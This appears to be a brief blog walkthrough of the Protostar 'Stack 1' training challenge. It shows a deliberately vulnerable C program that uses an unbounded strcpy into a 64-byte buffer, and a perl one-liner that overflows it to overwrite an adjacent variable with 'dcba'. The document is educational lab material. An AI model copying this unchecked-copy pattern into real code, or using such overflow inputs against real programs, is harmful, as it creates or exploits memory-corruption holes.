Exploit Exercises - Protostar Stack 1

This challenge is very similar to the previous one. The main difference is that instead of just validating that the “modified” value was changed, it validates that it was changed to a specific value, 0x61626364, or “dcba” in ASCII.

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int main(int argc, char **argv)
{
 volatile int modified;
 char buffer[64];

 if(argc == 1) {
  errx(1, "please specify an argument\n");
 }

 modified = 0;
 strcpy(buffer, argv[1]);

 if(modified == 0x61626364) {
  printf("you have correctly got the variable to the right value\n");
 } else {
  printf("Try again, you got 0x%08x\n", modified);
 }
}

To complete this, we simply run:

user@protostar:/opt/protostar/bin$ ./stack1 `perl -e 'print "A"x64 . "dcba"'`
you have correctly got the variable to the right value

This will fill up the “buffer” with 64 “A”s, and overflow “dcba” into the “modified” variable.

comments powered by Disqus